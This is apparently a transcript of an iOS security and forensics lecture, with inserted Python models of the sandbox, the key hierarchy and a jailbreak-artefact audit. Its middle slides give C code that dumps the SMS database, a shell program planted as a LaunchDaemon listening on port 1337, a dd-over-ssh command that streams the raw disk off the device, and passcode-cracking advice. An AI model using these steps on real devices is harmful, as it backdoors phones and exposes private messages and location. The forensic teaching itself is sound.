iOS Security and Forensics
TRANSCRIPT
Apple’s Security Model
- iDevice applications available on the Apple Store
- Tested, analyzed, approved, signed, then distributed by Apple services
- Installed in: /private/var/mobile/Applications/{Unique_App_ID}
- Full list of installed applications: /private/var/mobile/Library/Caches/com.apple.mobile.installation.plist
- Executed under the "mobile" user in the TrustedBSD sandbox
- ASLR and DEP activated
- All that, on a fully encrypted filesystem.
TrustedBSD Sandbox
- Open source project for FreeBSD systems
- Sponsored by Apple, Google, Yahoo!, NSA...
- Modified and used by Apple for OS X and iOS
- Installs a series of hooks in order to intercept and filter syscalls
- Policy retrieved from a human-readable file, then passed to the kernel in a binary format
- Finally the kernel installs the sandbox rules for the process
Policy rules
- Stored in /usr/share/sandbox and hardcoded in the kernel
- Some policy configuration is done by the user through popups
- Written in ESDL schema, human readable:
(version 1)
(allow default)
(deny file-read-data (regex #"^/private/tmp/test\.c$"))
- $ sandbox-exec -p '{$POLICY}' /bin/sh
- $ file /private/tmp/test.c
test.c: cannot open: Operation not permitted
- $ sandbox-exec -n no-internet /bin/sh
- $ ping 4.2.2.2
ping: sendto: Operation not permitted
- The sandbox_init() syscall uses libsandbox.dylib to convert the policy into binary format.
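To make the "allow by default, deny by regex" semantics of the policy above concrete, here is a small evaluator written for this transcript (it is not Apple's libsandbox and does not produce the kernel's binary format). It parses rules of the exact shape shown on the slide; the sample policy, the extra network-outbound rule, and the "last matching rule wins" evaluation order are assumptions of this model.

```python
import re

# Constructed sample policy in the shape the slide uses (hypothetical file content).
SAMPLE_POLICY = r'''
(version 1)
(allow default)
(deny file-read-data (regex #"^/private/tmp/test\.c$"))
(deny network-outbound)
'''

# One rule: (allow|deny) <operation> [(regex #"<pattern>")]
RULE_RE = re.compile(
    r'\((allow|deny)\s+([\w*-]+)'                   # verb and operation ("default", "file-read-data", ...)
    r'(?:\s+\(regex\s+#"((?:[^"\\]|\\.)*)"\))?'     # optional path filter, quoted with #"..."
    r'\s*\)'
)


def parse_policy(text):
    """Return (default_verdict, rules); rules are (verb, operation, compiled regex or None)."""
    default = 'deny'  # assumption: without an explicit (allow default) everything is denied
    rules = []
    for verb, op, pattern in RULE_RE.findall(text):
        if op == 'default':
            default = verb
        else:
            rules.append((verb, op, re.compile(pattern) if pattern else None))
    return default, rules


def evaluate(policy, operation, path=None):
    """Decide whether `operation` on `path` is allowed.

    Simplified semantics (an assumption of this model): start from the default verdict,
    apply every rule for this operation whose filter (if any) matches the path, and let
    the last matching rule win.
    """
    default, rules = policy
    verdict = default
    for verb, op, filt in rules:
        if op != operation:
            continue
        if filt is not None and (path is None or not filt.search(path)):
            continue
        verdict = verb
    return verdict == 'allow'


if __name__ == '__main__':
    policy = parse_policy(SAMPLE_POLICY)
    for op, path in [('file-read-data', '/private/tmp/test.c'),
                     ('file-read-data', '/private/tmp/other.c'),
                     ('network-outbound', None)]:
        print(op, path, '->', 'allow' if evaluate(policy, op, path) else 'deny')
```

Reading /private/tmp/test.c is refused while any other path is still readable, which is exactly the behaviour the `file` command on the slide shows; the `no-internet` profile corresponds to the network-outbound deny rule.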
iDevice Storage Device
The NAND storage device is laid out as follows:
- BOOT (block 0): contains the bootloader
- PLOG (block 1): contains the EMF, BAG1 and Dkey
  - EMF: used to encrypt the entire filesystem and the HFS journal
  - BAG1: used to encrypt the keybag
  - Dkey: used to encrypt files without an encryption policy class
- NVM (blocks 2-7): stores the NVRAM parameters
- FIRM (blocks 8-15): stores the firmware, iBoot, device tree & logos
- FSYS (blocks 16-4084): stores the encrypted filesystem
- RSRV (last 15 blocks): reserved
Encryption mechanism
Starting from the iPhone 3GS, Apple devices contain a hardware encryption processor. It permits the following:
- UID keys stored in the processor
- 0x835 & 0x89B keys derived from the UID key
- Filesystem:
  - Data partition encrypted with the EMF (AES-128)
  - System partition encrypted with a hardcoded AES-256 key (in the kernel & bootloaders)
- Keychain encryption with the Dkey
- The Keybag contains the Master Keys for the Protection Classes
- Some Master Keys are encrypted with the passcode
- Each file on the filesystem is encrypted with a "cprotect" key
- Each "cprotect" key is encrypted with the file's associated Protection Class Master Key
At boot, the EMF and Dkey are extracted automatically.
Protection Classes
File decryption is governed by the file's associated "Protection Class".
Protection Classes used for files:
- NSFileProtectionComplete: file only decrypted when the iDevice is unlocked.
- NSFileProtectionCompleteUnlessOpen: file only decrypted when the iDevice is unlocked. It stays decrypted even after lock if the application keeps it open.
- NSFileProtectionCompleteUntilFirstUserAuthentication: file decrypted after a successful unlock. It remains decrypted until the next reboot.
- NSFileProtectionNone: file decrypted using the Dkey.
- NSFileProtectionRecovery: undocumented.
Protection Classes used for keychains:
- kSecAttrAccessibleWhenUnlocked[ThisDeviceOnly]
- kSecAttrAccessibleAfterFirstUnlock[ThisDeviceOnly]
- kSecAttrAccessibleAlways[ThisDeviceOnly]
Data wiping and recovery
- Filesystem wiping consists of rewriting the EMF & Dkey
- File deletion consists of rewriting the associated cprotect key
- The filesystem's journal:
  - encrypted with the Dkey
  - contains cprotect keys in cleartext
  - rotates depending on filesystem activity
  - could be retrieved and used to recover deleted files
- /dev/disk0s1s2 raw data backup:
  - Connect the iDevice to a power supply
  - Disable the autolock
  - Run:
$ dd if=/dev/rdisk0 bs=4k | ssh -C username@computer_ip 'dd of=/home/{$USER}/dump.dmg'
  - Wait... for... a... while...
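The encryption-mechanism slide and the wiping/recovery slide above describe one key hierarchy: the EMF over the data partition, a class master key per Protection Class (the Dkey for NSFileProtectionNone), and a per-file cprotect key wrapped by its class key, with copies of cprotect keys living in the journal. The following model, added here for this transcript and not taken from the slides or any Apple code, plays that hierarchy out: a file is written, "deleted" by overwriting its cprotect key, recovered from a journal copy, and finally lost for good once the EMF and Dkey are regenerated. AES is replaced by an HMAC-SHA256 counter keystream (an assumption so the model runs with the standard library only), and the SQLite header is used to validate a recovered file; the file content is constructed.

```python
import hashlib
import hmac
import os

SQLITE_MAGIC = b"SQLite format 3\x00"  # real SQLite file header, used to validate a recovered file


def _xor_stream(key, nonce, data):
    """Toy stand-in for AES (an assumption of this model): XOR with an HMAC-SHA256 counter keystream."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hmac.new(key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
        out.extend(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


def wrap(key, data):
    nonce = os.urandom(8)
    return nonce + _xor_stream(key, nonce, data)


def unwrap(key, blob):
    return _xor_stream(key, blob[:8], blob[8:])


class Device:
    """Simplified key hierarchy: EMF over the whole data partition, one class master key per
    Protection Class (the Dkey for NSFileProtectionNone), one cprotect key per file."""

    def __init__(self):
        self.emf = os.urandom(32)
        self.dkey = os.urandom(32)
        self.class_keys = {
            "NSFileProtectionNone": self.dkey,
            "NSFileProtectionComplete": os.urandom(32),  # really wrapped with the passcode; simplified
        }
        self.files = {}    # name -> {"class", "cprotect" (wrapped), "blocks"}
        self.journal = []  # journal entries, encrypted with the Dkey, each holding a cprotect key

    def write_file(self, name, data, cls="NSFileProtectionNone"):
        cprotect = os.urandom(32)
        self.journal.append(wrap(self.dkey, cprotect))           # journal keeps a copy of the key
        self.files[name] = {
            "class": cls,
            "cprotect": wrap(self.class_keys[cls], cprotect),    # key wrapped by the class master key
            "blocks": wrap(self.emf, wrap(cprotect, data)),       # data under cprotect, then under EMF
        }

    def read_file(self, name):
        rec = self.files[name]
        cprotect = unwrap(self.class_keys[rec["class"]], rec["cprotect"])
        return unwrap(cprotect, unwrap(self.emf, rec["blocks"]))

    def delete_file(self, name):
        """Deletion only overwrites the file's wrapped cprotect key; the data blocks stay on NAND."""
        rec = self.files[name]
        rec["cprotect"] = os.urandom(len(rec["cprotect"]))

    def wipe(self):
        """A filesystem wipe only regenerates the EMF and the Dkey."""
        self.emf = os.urandom(32)
        self.dkey = os.urandom(32)
        self.class_keys["NSFileProtectionNone"] = self.dkey

    def recover_from_journal(self, name, magic=SQLITE_MAGIC):
        """Try every cprotect key still readable from the journal against the file's blocks;
        accept a candidate when the decrypted content starts with the expected header."""
        blocks = unwrap(self.emf, self.files[name]["blocks"])
        for entry in self.journal:
            plain = unwrap(unwrap(self.dkey, entry), blocks)
            if plain.startswith(magic):
                return plain
        return None


if __name__ == "__main__":
    dev = Device()
    dev.write_file("sms.db", SQLITE_MAGIC + b"constructed sms.db payload")
    dev.delete_file("sms.db")
    print("recovered from journal:", dev.recover_from_journal("sms.db") is not None)
    dev.wipe()
    print("recovered after wipe:", dev.recover_from_journal("sms.db") is not None)
```

The journal entries are only useful while the Dkey that encrypts them survives, which is why a wipe that rewrites the EMF and Dkey makes the whole partition, journal included, unrecoverable even though no data block is ever overwritten.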
Jailbreak
- Execution of third-party applications/code allowed
- Unsigned code execution granted (depending on the jailbreak)
- Complete bypass of the sandbox
- Root (/) partition mounted read/write
- Before jailbreak:
$ cat /etc/fstab
/dev/disk0s1 / hfs r 0 1
/dev/disk2s1 /private/var hfs rw 0 2
- After jailbreak:
$ cat /etc/fstab
/dev/disk0s1 / hfs rw 0 1
/dev/disk2s1 /private/var hfs rw 0 2
Note: on iOS >= 5, /dev/disk2s1 became /dev/disk1s2
Useful information
- launchd: first binary executed while booting (init-like)
- watchdog: checks whether a process has been running in memory for more than 5 min; if so, it reboots the iDevice
- launchctl: used to control daemons
  $ launchctl load com.adel.reverse_shell.plist
- ldid: Link Identity Editor, used to sign a binary
  $ ldid -S my_binary
- usbmux: protocol created to encapsulate TCP over USB connections. Optimized and used by iTunes.
- XCode: development platform on Mac OS X, freely downloadable from the Apple Store
- Cydia Store: unofficial online application store for jailbroken devices
- SSH binaries: freely available package on the Cydia store.
HelloWorld for iDevice
- Simple HelloWorld program:
$ cat helloworld.c
#include <stdio.h>

int main(int argc, char *argv[])
{
    printf("HelloWorld\n");
    return 0;
}
- Cross-compile with the iPhoneOS SDK:
$ export PF=/Developer/Platforms/iPhoneOS.platform
$ $PF/Developer/usr/bin/arm-apple-darwin10-llvm-gcc-4.2 -o hello helloworld.c -isysroot $PF/Developer/SDKs/iPhoneOS5.0.sdk/
- Binary self-signing:
$ ldid -S hello
- Simple binary file transfer over SSH:
$ scp hello root@<iDevice_IP_Addr>:/usr/bin/my_binary
Local File Disclosure
$ cat lfi_smsdb.c
#include <stdio.h>

/* Dumps the SMS database to stdout, byte by byte. */
int main(void)
{
    FILE *fp = fopen("/var/mobile/Library/SMS/sms.db", "r");
    int c;

    if (fp == NULL) {
        perror("fopen");
        return 1;
    }
    /* Test fgetc()'s return value: a feof() loop would emit one spurious byte. */
    while ((c = fgetc(fp)) != EOF)
        putchar(c);
    fclose(fp);
    return 0;
}
Reverse Shell
$ cat reverse_shell.c
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    char *const argv[] = { "/bin/sh", NULL };

    /* Replace this process image with /bin/sh; execve() only returns on failure. */
    execve("/bin/sh", argv, NULL);
    perror("execve");
    return 1;
}
Process Daemonizing
- Copy reverse_shell to /usr/bin on the iDevice
- Copy com.adel.reverse_shell.plist to /System/Library/LaunchDaemons/ on the iDevice
- Reboot the iDevice, or:
$ cd /System/Library/LaunchDaemons
$ launchctl load ./com.adel.reverse_shell.plist
plist Manifest Format
- XML file format, used for configuration purposes
- $ cd /System/Library/LaunchDaemons
- $ cat com.adel.reverse_shell.plist
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
...
<key>Label</key>
<string>com.adel.reverse_shell</string>
<key>Program</key>
<string>/usr/bin/reverse_shell</string>
<key>Sockets</key>
<dict>
  <key>Listeners</key>
  <dict>
    <key>SockServiceName</key>
    <string>1337</string>
  </dict>
</dict>
...
</plist>
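The two persistent artefacts this deck has shown so far, the rw root entry in /etc/fstab after a jailbreak and a LaunchDaemon manifest that makes launchd open a listening socket, are also what an examiner looks for on a device. The following checker is added here for this transcript (it is not from the slides and not an Apple tool): it parses an fstab and a LaunchDaemons plist with the standard library and reports both indicators. The fstab text and the plist bytes are constructed to match the slides, with the `<dict>` wrapper the slide elides filled in.

```python
import plistlib

# Constructed inputs, in the shape shown on the slides.
FSTAB_AFTER_JAILBREAK = """\
/dev/disk0s1 / hfs rw 0 1
/dev/disk2s1 /private/var hfs rw 0 2
"""

DAEMON_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.adel.reverse_shell</string>
  <key>Program</key><string>/usr/bin/reverse_shell</string>
  <key>Sockets</key>
  <dict>
    <key>Listeners</key>
    <dict><key>SockServiceName</key><string>1337</string></dict>
  </dict>
</dict>
</plist>
"""


def parse_fstab(text):
    """Return {mount_point: [options]} from fstab text; blank lines and comments are skipped."""
    mounts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) >= 4:
            mounts[fields[1]] = fields[3].split(",")
    return mounts


def root_is_writable(fstab_text):
    """A root (/) partition mounted rw is the jailbreak indicator the fstab slide describes."""
    return "rw" in parse_fstab(fstab_text).get("/", [])


def daemon_listeners(plist_bytes):
    """Return (Label, Program, [service names or ports]) for one LaunchDaemon manifest.

    Sockets maps a name to a dict or to a list of dicts; SockServiceName may be a string or an int.
    """
    manifest = plistlib.loads(plist_bytes)
    ports = []
    for sock in manifest.get("Sockets", {}).values():
        for entry in (sock if isinstance(sock, list) else [sock]):
            name = entry.get("SockServiceName")
            if name is not None:
                ports.append(str(name))
    return manifest.get("Label"), manifest.get("Program"), ports


def audit(fstab_text, plists):
    """Collect human-readable findings from an fstab and a set of LaunchDaemon manifests."""
    findings = []
    if root_is_writable(fstab_text):
        findings.append("root filesystem mounted read/write (jailbreak indicator)")
    for raw in plists:
        label, program, ports = daemon_listeners(raw)
        if ports:
            findings.append(f"{label} runs {program} and listens on {', '.join(ports)}")
    return findings


if __name__ == "__main__":
    for finding in audit(FSTAB_AFTER_JAILBREAK, [DAEMON_PLIST]):
        print("-", finding)
```

On a real device the inputs would be /etc/fstab and every file under /System/Library/LaunchDaemons, read from a mounted image or over SSH; a daemon with a listener whose Program lives outside the stock locations is the kind of entry worth a second look.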
Physical Access Pwnage
Many possibilities:
- Easy: the iDevice has no passcode
  - Full access to data over SpringBoard, SSH or after booting on a ramdisk
- Medium: the iDevice has a passcode < 4 digits
  - Boot on a ramdisk, patch the kernel and crack the passcode
  - Needs at most 30 min of passcode cracking (10^4 possibilities)
- Medium ++: the iDevice has a passcode > 5 digits
  - Could take time to crack
  - The xkcd $5 wrench shall be used!
- Hard: the iDevice has a boot passcode (EMF + Dkey encrypted with it)
  - Does it exist?
LiveCD vs RAMDISK
- A 2 MB HFS+ container with:
  - customized launchd
  - binaries to copy/execute
  - plist files
- Loaded onto the iDevice over USB after rebooting into DFU mode:
  - exploit the iDevice vulnerability
  - load the ramdisk into RAM
  - execute launchd
  - disable the watchdog
  - option 1:
    - scan and mount the filesystem (EMF + Dkey auto-extracted)
    - copy files on the filesystem
    - chroot into the mounted filesystem
  - option 2:
    - initialize the usbmux protocol
    - read and send raw NAND data over USB (EMF + Dkey must be extracted manually)
Sensitive Data
- Keyboard cache
- Clipboard buffer
- Consolidated GPS positions database and latest GPS position
- Application and Safari snapshot cache
- Google Maps cache and history
- Address book, photos, songs, voice records, notes, calendar, call history
- SMS, MMS, drafts and Spotlight SMS cache
- Geolocation tags on photos
- Safari cache, search list, bookmarks, cookies, history and WebKit cache
- Installed applications list
- Emails, applications, their data and cache
- Last dialed number, bookmarked contact list, IMSI, ICCID
- Configured access point list...
Keyboard Cache
Contains the keyboard cache:
- Typed known and unknown words
- One cache per language
- Available in /private/var/mobile/Library/Keyboard/
Applications snapshot
Available in: /private/var/mobile/Library/Caches/Snapshots/{APP_NAME}/{NAME}.jpg
Consolidated GPS Positions Database
Available in: /private/var/root/Library/Caches/locationd/consolidated.db
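consolidated.db is a SQLite database, so the positions and the latest position the "Sensitive Data" slide mentions can be pulled out with a few queries. The reader below is added here for this transcript, not taken from the slides: it assumes a CellLocation table with Timestamp, Latitude, Longitude and HorizontalAccuracy columns (a simplification of the real locationd layout) and timestamps in Core Foundation absolute time, i.e. seconds since 2001-01-01 UTC rather than the Unix epoch; the rows are constructed and the coordinates are illustrative.

```python
import sqlite3
from datetime import datetime, timedelta, timezone

# Core Foundation absolute time counts seconds from this epoch, not from 1970.
CF_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)

# Constructed rows standing in for the real cache (Timestamp, Latitude, Longitude, HorizontalAccuracy).
SAMPLE_ROWS = [
    (331003600.0, 48.8606, 2.3376, 250.0),
    (331000000.0, 48.8584, 2.2945, 500.0),
]


def build_sample_db():
    """In-memory stand-in for consolidated.db using the assumed CellLocation layout."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE CellLocation ("
        "Timestamp REAL, Latitude REAL, Longitude REAL, HorizontalAccuracy REAL)"
    )
    conn.executemany("INSERT INTO CellLocation VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def cf_to_datetime(seconds):
    """Convert a Core Foundation absolute timestamp to an aware UTC datetime."""
    return CF_EPOCH + timedelta(seconds=seconds)


def positions(conn, table="CellLocation"):
    """Return (iso_utc_time, lat, lon, accuracy_m) tuples in chronological order."""
    rows = conn.execute(
        f"SELECT Timestamp, Latitude, Longitude, HorizontalAccuracy "
        f"FROM {table} ORDER BY Timestamp"
    ).fetchall()
    return [(cf_to_datetime(t).isoformat(), lat, lon, acc) for t, lat, lon, acc in rows]


def latest_position(conn, table="CellLocation"):
    """The most recent fix, or None for an empty table."""
    rows = positions(conn, table)
    return rows[-1] if rows else None


if __name__ == "__main__":
    db = build_sample_db()
    for row in positions(db):
        print(row)
    print("latest:", latest_position(db))
```

On a real image the same functions take `sqlite3.connect("/path/to/consolidated.db")`; the epoch conversion is the part people most often get wrong, since treating these values as Unix time shifts every fix by 31 years.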